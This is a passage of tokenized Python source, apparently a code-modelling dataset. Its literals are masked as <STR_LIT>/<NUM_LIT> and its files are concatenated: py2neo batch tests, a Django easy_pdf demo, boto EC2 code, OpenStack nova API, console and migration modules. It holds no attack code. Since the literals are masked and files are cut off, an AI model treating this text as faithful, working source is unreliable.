create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] != bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_get_or_create_path_with_existing_nodes ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> bob = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice | bob ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , bob ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert len ( path ) == <NUM_LIT:1> <EOL> assert path . 
nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path [ <NUM_LIT:0> ] . type ( ) == "<STR_LIT>" <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_path_merging_is_idempotent ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> bob = path . nodes ( ) [ <NUM_LIT:1> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert bob [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> self . batch = WriteBatch ( self . graph ) <EOL> self . batch . get_or_create_path ( alice , "<STR_LIT>" , { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> results = self . batch . run ( ) <EOL> path = results [ <NUM_LIT:0> ] <EOL> assert path . nodes ( ) [ <NUM_LIT:0> ] == alice <EOL> assert path . nodes ( ) [ <NUM_LIT:1> ] == bob <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_property_on_preexisting_node ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . set_property ( alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_property_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . set_property ( alice , "<STR_LIT>" , <NUM_LIT> ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_properties_on_preexisting_node ( self ) : <EOL> alice = Node ( ) <EOL> self . graph . create ( alice ) <EOL> self . batch . 
set_properties ( alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_properties_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { } ) <EOL> self . batch . set_properties ( alice , { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] == <NUM_LIT> <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_property_on_preexisting_node ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . graph . create ( alice ) <EOL> self . batch . delete_property ( alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] is None <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_property_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . delete_property ( alice , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert alice [ "<STR_LIT:name>" ] == "<STR_LIT>" <EOL> assert alice [ "<STR_LIT>" ] is None <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_properties_on_preexisting_node ( self ) : <EOL> alice = cast_node ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . graph . create ( alice ) <EOL> self . batch . 
delete_properties ( alice ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert not alice <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_delete_properties_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT> } ) <EOL> self . batch . delete_properties ( alice ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert not alice <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_labels_to_preexisting_node ( self ) : <EOL> alice = Node ( name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . add_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_labels_to_node_in_same_batch ( self ) : <EOL> a = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . add_labels ( a , "<STR_LIT>" , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( a ) ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_remove_labels_from_preexisting_node ( self ) : <EOL> alice = Node ( "<STR_LIT>" , "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . remove_label ( alice , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_add_and_remove_labels_on_node_in_same_batch ( self ) : <EOL> alice = self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . 
add_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . remove_label ( alice , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ self . batch . find ( alice ) ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_labels_on_preexisting_node ( self ) : <EOL> alice = Node ( "<STR_LIT>" , "<STR_LIT>" , name = "<STR_LIT>" ) <EOL> self . graph . create ( alice ) <EOL> self . batch . set_labels ( alice , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . run ( ) <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> @ skipIf ( version_2_1 , "<STR_LIT>" ) <EOL> def test_can_set_labels_on_node_in_same_batch ( self ) : <EOL> self . batch . create ( { "<STR_LIT:name>" : "<STR_LIT>" } ) <EOL> self . batch . add_labels ( <NUM_LIT:0> , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . batch . set_labels ( <NUM_LIT:0> , "<STR_LIT>" , "<STR_LIT>" ) <EOL> results = self . batch . run ( ) <EOL> alice = results [ <NUM_LIT:0> ] <EOL> self . graph . pull ( alice ) <EOL> assert set ( alice . labels ( ) ) == { "<STR_LIT>" , "<STR_LIT>" } <EOL> class NodePointerTestCase ( GraphTestCase ) : <EOL> def test_node_pointer_equality ( self ) : <EOL> p1 = NodePointer ( <NUM_LIT> ) <EOL> p2 = NodePointer ( <NUM_LIT> ) <EOL> assert p1 == p2 <EOL> def test_node_pointer_inequality ( self ) : <EOL> p1 = NodePointer ( <NUM_LIT> ) <EOL> p2 = NodePointer ( <NUM_LIT> ) <EOL> assert p1 != p2 <EOL> def test_node_pointer_hashes ( self ) : <EOL> assert hash ( NodePointer ( <NUM_LIT> ) ) == hash ( NodePointer ( <NUM_LIT> ) ) <EOL> def test_node_pointer_str ( self ) : <EOL> pointer = NodePointer ( <NUM_LIT> ) <EOL> assert str ( pointer ) == "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import os <EOL> import logging <EOL> logging . basicConfig ( ) <EOL> from django . conf import settings <EOL> from django . conf . urls import patterns , url <EOL> from django . core . wsgi import get_wsgi_application <EOL> from django . utils . timezone import now as tznow <EOL> basename = os . path . splitext ( os . path . basename ( __file__ ) ) [ <NUM_LIT:0> ] <EOL> def rel ( * path ) : <EOL> return os . path . abspath ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , * path ) <EOL> ) . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> DEBUG = True , <EOL> TIMEZONE = "<STR_LIT>" , <EOL> INSTALLED_APPS = [ "<STR_LIT>" ] , <EOL> TEMPLATE_DIRS = [ rel ( "<STR_LIT>" , "<STR_LIT>" ) ] , <EOL> STATIC_ROOT = os . path . abspath ( rel ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> ROOT_URLCONF = basename , <EOL> WSGI_APPLICATION = "<STR_LIT>" . format ( basename ) , <EOL> ) <EOL> from easy_pdf . views import PDFTemplateView <EOL> class HelloPDFView ( PDFTemplateView ) : <EOL> template_name = "<STR_LIT>" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> return super ( HelloPDFView , self ) . get_context_data ( <EOL> pagesize = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> today = tznow ( ) , <EOL> ** kwargs <EOL> ) <EOL> urlpatterns = patterns ( "<STR_LIT>" , <EOL> url ( r"<STR_LIT>" , HelloPDFView . as_view ( ) ) <EOL> ) <EOL> application = get_wsgi_application ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from django . core . management import call_command <EOL> call_command ( "<STR_LIT>" , "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import boto <EOL> from boto . resultset import ResultSet <EOL> from boto . ec2 . instance import Reservation <EOL> from boto . ec2 . instance import Group <EOL> from boto . ec2 . instance import Instance <EOL> class ReservationV6 ( Reservation ) : <EOL> def startElement ( self , name , attrs , connection ) : <EOL> if name == '<STR_LIT>' : <EOL> self . instances = ResultSet ( [ ( '<STR_LIT>' , InstanceV6 ) ] ) <EOL> return self . instances <EOL> elif name == '<STR_LIT>' : <EOL> self . groups = ResultSet ( [ ( '<STR_LIT>' , Group ) ] ) <EOL> return self . groups <EOL> else : <EOL> return None <EOL> class InstanceV6 ( Instance ) : <EOL> def __init__ ( self , connection = None ) : <EOL> Instance . __init__ ( self , connection ) <EOL> self . dns_name_v6 = None <EOL> def endElement ( self , name , value , connection ) : <EOL> Instance . endElement ( self , name , value , connection ) <EOL> if name == '<STR_LIT>' : <EOL> self . dns_name_v6 = value <EOL> def _update ( self , updated ) : <EOL> self . __dict__ . update ( updated . __dict__ ) <EOL> self . dns_name_v6 = updated . dns_name_v6 </s>
<s> """<STR_LIT>""" <EOL> import webob . exc <EOL> from nova import compute <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import log as logging <EOL> from nova . api . openstack import common <EOL> from nova . api . openstack import extensions <EOL> from nova . api . openstack import faults <EOL> from nova . api . openstack . contrib import admin_only <EOL> from nova . scheduler import api as scheduler_api <EOL> LOG = logging . getLogger ( "<STR_LIT>" ) <EOL> FLAGS = flags . FLAGS <EOL> def _list_hosts ( req , service = None ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> hosts = scheduler_api . get_host_list ( context ) <EOL> if service : <EOL> hosts = [ host for host in hosts <EOL> if host [ "<STR_LIT>" ] == service ] <EOL> return hosts <EOL> def check_host ( fn ) : <EOL> """<STR_LIT>""" <EOL> def wrapped ( self , req , id , service = None , * args , ** kwargs ) : <EOL> listed_hosts = _list_hosts ( req , service ) <EOL> hosts = [ h [ "<STR_LIT>" ] for h in listed_hosts ] <EOL> if id in hosts : <EOL> return fn ( self , req , id , * args , ** kwargs ) <EOL> else : <EOL> raise exception . HostNotFound ( host = id ) <EOL> return wrapped <EOL> class HostController ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . compute_api = compute . API ( ) <EOL> super ( HostController , self ) . __init__ ( ) <EOL> def index ( self , req ) : <EOL> return { '<STR_LIT>' : _list_hosts ( req ) } <EOL> @ check_host <EOL> def update ( self , req , id , body ) : <EOL> for raw_key , raw_val in body . iteritems ( ) : <EOL> key = raw_key . lower ( ) . strip ( ) <EOL> val = raw_val . lower ( ) . strip ( ) <EOL> if key == "<STR_LIT:status>" : <EOL> if val [ : <NUM_LIT:6> ] in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return self . _set_enabled_status ( req , id , <EOL> enabled = ( val . startswith ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> explanation = _ ( "<STR_LIT>" ) % raw_val <EOL> raise webob . exc . 
HTTPBadRequest ( explanation = explanation ) <EOL> else : <EOL> explanation = _ ( "<STR_LIT>" ) % raw_key <EOL> raise webob . exc . HTTPBadRequest ( explanation = explanation ) <EOL> def _set_enabled_status ( self , req , host , enabled ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> state = "<STR_LIT>" if enabled else "<STR_LIT>" <EOL> LOG . audit ( _ ( "<STR_LIT>" ) % locals ( ) ) <EOL> result = self . compute_api . set_host_enabled ( context , host = host , <EOL> enabled = enabled ) <EOL> if result not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> raise webob . exc . HTTPBadRequest ( explanation = result ) <EOL> return { "<STR_LIT:host>" : host , "<STR_LIT:status>" : result } <EOL> def _host_power_action ( self , req , host , action ) : <EOL> """<STR_LIT>""" <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> try : <EOL> result = self . compute_api . host_power_action ( context , host = host , <EOL> action = action ) <EOL> except NotImplementedError as e : <EOL> raise webob . exc . HTTPBadRequest ( explanation = e . msg ) <EOL> return { "<STR_LIT:host>" : host , "<STR_LIT>" : result } <EOL> def startup ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> def shutdown ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> def reboot ( self , req , id ) : <EOL> return self . _host_power_action ( req , host = id , action = "<STR_LIT>" ) <EOL> class Hosts ( extensions . ExtensionDescriptor ) : <EOL> def get_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_alias ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_description ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_namespace ( self ) : <EOL> return "<STR_LIT>" <EOL> def get_updated ( self ) : <EOL> return "<STR_LIT>" <EOL> @ admin_only . admin_only <EOL> def get_resources ( self ) : <EOL> resources = [ extensions . 
ResourceExtension ( '<STR_LIT>' , <EOL> HostController ( ) , collection_actions = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> member_actions = { "<STR_LIT>" : "<STR_LIT:GET>" , "<STR_LIT>" : "<STR_LIT:GET>" , <EOL> "<STR_LIT>" : "<STR_LIT:GET>" } ) ] <EOL> return resources </s>
<s> import os . path <EOL> from nova . api . openstack import common <EOL> class ViewBuilder ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_url , project_id = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> self . base_url = base_url <EOL> self . project_id = project_id <EOL> def _format_dates ( self , image ) : <EOL> """<STR_LIT>""" <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if image . get ( attr ) is not None : <EOL> image [ attr ] = image [ attr ] . strftime ( '<STR_LIT>' ) <EOL> def _format_status ( self , image ) : <EOL> """<STR_LIT>""" <EOL> status_mapping = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> try : <EOL> image [ '<STR_LIT:status>' ] = status_mapping [ image [ '<STR_LIT:status>' ] ] <EOL> except KeyError : <EOL> image [ '<STR_LIT:status>' ] = '<STR_LIT>' <EOL> def _build_server ( self , image , image_obj ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def generate_href ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( self . base_url , "<STR_LIT>" , str ( image_id ) ) <EOL> def build ( self , image_obj , detail = False ) : <EOL> """<STR_LIT>""" <EOL> self . _format_dates ( image_obj ) <EOL> if "<STR_LIT:status>" in image_obj : <EOL> self . _format_status ( image_obj ) <EOL> image = { <EOL> "<STR_LIT:id>" : image_obj . get ( "<STR_LIT:id>" ) , <EOL> "<STR_LIT:name>" : image_obj . get ( "<STR_LIT:name>" ) , <EOL> } <EOL> self . _build_server ( image , image_obj ) <EOL> self . _build_image_id ( image , image_obj ) <EOL> if detail : <EOL> image . update ( { <EOL> "<STR_LIT>" : image_obj . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : image_obj . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT:status>" : image_obj . get ( "<STR_LIT:status>" ) , <EOL> } ) <EOL> if image [ "<STR_LIT:status>" ] . 
upper ( ) == "<STR_LIT>" : <EOL> image [ "<STR_LIT>" ] = <NUM_LIT:100> <EOL> else : <EOL> image [ "<STR_LIT>" ] = <NUM_LIT:0> <EOL> return image <EOL> class ViewBuilderV10 ( ViewBuilder ) : <EOL> """<STR_LIT>""" <EOL> def _build_server ( self , image , image_obj ) : <EOL> try : <EOL> image [ '<STR_LIT>' ] = int ( image_obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> except ( KeyError , ValueError ) : <EOL> pass <EOL> def _build_image_id ( self , image , image_obj ) : <EOL> try : <EOL> image [ '<STR_LIT:id>' ] = int ( image_obj [ '<STR_LIT:id>' ] ) <EOL> except ValueError : <EOL> pass <EOL> class ViewBuilderV11 ( ViewBuilder ) : <EOL> """<STR_LIT>""" <EOL> def _build_server ( self , image , image_obj ) : <EOL> try : <EOL> serverRef = image_obj [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> image [ '<STR_LIT>' ] = { <EOL> "<STR_LIT:id>" : common . get_id_from_href ( serverRef ) , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : serverRef , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : common . remove_version_from_href ( serverRef ) , <EOL> } , <EOL> ] <EOL> } <EOL> except KeyError : <EOL> return <EOL> def _build_image_id ( self , image , image_obj ) : <EOL> image [ '<STR_LIT:id>' ] = "<STR_LIT:%s>" % image_obj [ '<STR_LIT:id>' ] <EOL> def generate_href ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( self . base_url , self . project_id , <EOL> "<STR_LIT>" , str ( image_id ) ) <EOL> def build ( self , image_obj , detail = False ) : <EOL> """<STR_LIT>""" <EOL> image = ViewBuilder . build ( self , image_obj , detail ) <EOL> href = self . generate_href ( image_obj [ "<STR_LIT:id>" ] ) <EOL> bookmark = self . 
generate_bookmark ( image_obj [ "<STR_LIT:id>" ] ) <EOL> image [ "<STR_LIT>" ] = [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> } , <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : bookmark , <EOL> } , <EOL> ] <EOL> if detail : <EOL> image [ "<STR_LIT>" ] = image_obj . get ( "<STR_LIT>" , { } ) <EOL> return image <EOL> def generate_bookmark ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( common . remove_version_from_href ( self . base_url ) , <EOL> self . project_id , "<STR_LIT>" , str ( image_id ) ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import json <EOL> from nova import exception <EOL> from nova import flags <EOL> from nova import log as logging <EOL> from nova . virt . vmwareapi import vim_util <EOL> FLAGS = flags . FLAGS <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" ) <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <EOL> <NUM_LIT:10> , <EOL> "<STR_LIT>" ) <EOL> class VMRCConsole ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( VMRCConsole , self ) . __init__ ( ) <EOL> @ property <EOL> def console_type ( self ) : <EOL> return '<STR_LIT>' <EOL> def get_port ( self , context ) : <EOL> """<STR_LIT>""" <EOL> return FLAGS . console_vmrc_port <EOL> def setup_console ( self , context , console ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def teardown_console ( self , context , console ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def init_host ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def fix_pool_password ( self , password ) : <EOL> """<STR_LIT>""" <EOL> return password <EOL> def generate_password ( self , vim_session , pool , instance_name ) : <EOL> """<STR_LIT>""" <EOL> username , password = pool [ '<STR_LIT:username>' ] , pool [ '<STR_LIT:password>' ] <EOL> vms = vim_session . _call_method ( vim_util , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT:name>' , '<STR_LIT>' ] ) <EOL> vm_ds_path_name = None <EOL> vm_ref = None <EOL> for vm in vms : <EOL> vm_name = None <EOL> ds_path_name = None <EOL> for prop in vm . propSet : <EOL> if prop . name == '<STR_LIT:name>' : <EOL> vm_name = prop . val <EOL> elif prop . name == '<STR_LIT>' : <EOL> ds_path_name = prop . val <EOL> if vm_name == instance_name : <EOL> vm_ref = vm . obj <EOL> vm_ds_path_name = ds_path_name <EOL> break <EOL> if vm_ref is None : <EOL> raise exception . InstanceNotFound ( instance_id = instance_name ) <EOL> json_data = json . 
dumps ( { '<STR_LIT>' : vm_ds_path_name , <EOL> '<STR_LIT:username>' : username , <EOL> '<STR_LIT:password>' : password } ) <EOL> return base64 . b64encode ( json_data ) <EOL> def is_otp ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class VMRCSessionConsole ( VMRCConsole ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( VMRCSessionConsole , self ) . __init__ ( ) <EOL> @ property <EOL> def console_type ( self ) : <EOL> return '<STR_LIT>' <EOL> def generate_password ( self , vim_session , pool , instance_name ) : <EOL> """<STR_LIT>""" <EOL> vms = vim_session . _call_method ( vim_util , '<STR_LIT>' , <EOL> '<STR_LIT>' , [ '<STR_LIT:name>' ] ) <EOL> vm_ref = None <EOL> for vm in vms : <EOL> if vm . propSet [ <NUM_LIT:0> ] . val == instance_name : <EOL> vm_ref = vm . obj <EOL> if vm_ref is None : <EOL> raise exception . InstanceNotFound ( instance_id = instance_name ) <EOL> virtual_machine_ticket = vim_session . _call_method ( <EOL> vim_session . _get_vim ( ) , <EOL> '<STR_LIT>' , <EOL> vim_session . _get_vim ( ) . get_service_content ( ) . sessionManager ) <EOL> json_data = json . dumps ( { '<STR_LIT>' : str ( vm_ref . value ) , <EOL> '<STR_LIT:username>' : virtual_machine_ticket , <EOL> '<STR_LIT:password>' : virtual_machine_ticket } ) <EOL> return base64 . b64encode ( json_data ) <EOL> def is_otp ( self ) : <EOL> """<STR_LIT>""" <EOL> return True </s>
<s> from sqlalchemy import Column , Integer , MetaData , String , Table <EOL> from nova import log as logging <EOL> meta = MetaData ( ) <EOL> def upgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instances = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> types = { } <EOL> for instance in migrate_engine . execute ( instances . select ( ) ) : <EOL> if instance . instance_type_id is None : <EOL> types [ instance . id ] = None <EOL> continue <EOL> try : <EOL> types [ instance . id ] = int ( instance . instance_type_id ) <EOL> except ValueError : <EOL> logging . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( instance . id , instance . instance_type_id ) ) <EOL> types [ instance . id ] = None <EOL> integer_column = Column ( '<STR_LIT>' , Integer ( ) , nullable = True ) <EOL> string_column = instances . c . instance_type_id <EOL> integer_column . create ( instances ) <EOL> for instance_id , instance_type_id in types . iteritems ( ) : <EOL> update = instances . update ( ) . where ( instances . c . id == instance_id ) . values ( instance_type_id_int = instance_type_id ) <EOL> migrate_engine . execute ( update ) <EOL> string_column . alter ( name = '<STR_LIT>' ) <EOL> integer_column . alter ( name = '<STR_LIT>' ) <EOL> string_column . drop ( ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta . bind = migrate_engine <EOL> instances = Table ( '<STR_LIT>' , meta , autoload = True , <EOL> autoload_with = migrate_engine ) <EOL> integer_column = instances . c . instance_type_id <EOL> string_column = Column ( '<STR_LIT>' , <EOL> String ( length = <NUM_LIT:255> , convert_unicode = False , <EOL> assert_unicode = None , unicode_error = None , <EOL> _warn_on_bytestring = False ) , <EOL> nullable = True ) <EOL> types = { } <EOL> for instance in migrate_engine . execute ( instances . select ( ) ) : <EOL> if instance . instance_type_id is None : <EOL> types [ instance . id ] = None <EOL> else : <EOL> types [ instance . 
id ] = str ( instance . instance_type_id ) <EOL> string_column . create ( instances ) <EOL> for instance_id , instance_type_id in types . iteritems ( ) : <EOL> update = instances . update ( ) . where ( instances . c . id == instance_id ) . values ( instance_type_id_str = instance_type_id ) <EOL> migrate_engine . execute ( update ) <EOL> integer_column . alter ( name = '<STR_LIT>' ) <EOL> string_column . alter ( name = '<STR_LIT>' ) <EOL> integer_column . drop ( ) </s>
<s> import sqlalchemy <EOL> from sqlalchemy import MetaData , Table , Column , String <EOL> from nova . compute import task_states <EOL> from nova . compute import vm_states <EOL> meta = MetaData ( ) <EOL> c_task_state = Column ( '<STR_LIT>' , <EOL> String ( length = <NUM_LIT:255> , convert_unicode = False , <EOL> assert_unicode = None , unicode_error = None , <EOL> _warn_on_bytestring = False ) , <EOL> nullable = True ) <EOL> _upgrade_translations = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : task_states . STOPPING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . STOPPED , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . DELETED , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : task_states . DELETING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . ACTIVE , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . BUILDING , <EOL> "<STR_LIT>" : task_states . SCHEDULING , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . MIGRATING , <EOL> "<STR_LIT>" : None , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : vm_states . BUILDING , <EOL> "<STR_LIT>" : task_states . SCHEDULING , <EOL> } , <EOL> } <EOL> _downgrade_translations = { <EOL> vm_states . ACTIVE : { <EOL> None : "<STR_LIT>" , <EOL> task_states . DELETING : "<STR_LIT>" , <EOL> task_states . STOPPING : "<STR_LIT>" , <EOL> } , <EOL> vm_states . BUILDING : { <EOL> None : "<STR_LIT>" , <EOL> task_states . SCHEDULING : "<STR_LIT>" , <EOL> } , <EOL> vm_states . STOPPED : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . REBUILDING : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . DELETED : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> vm_states . MIGRATING : { <EOL> None : "<STR_LIT>" , <EOL> } , <EOL> } <EOL> def upgrade ( 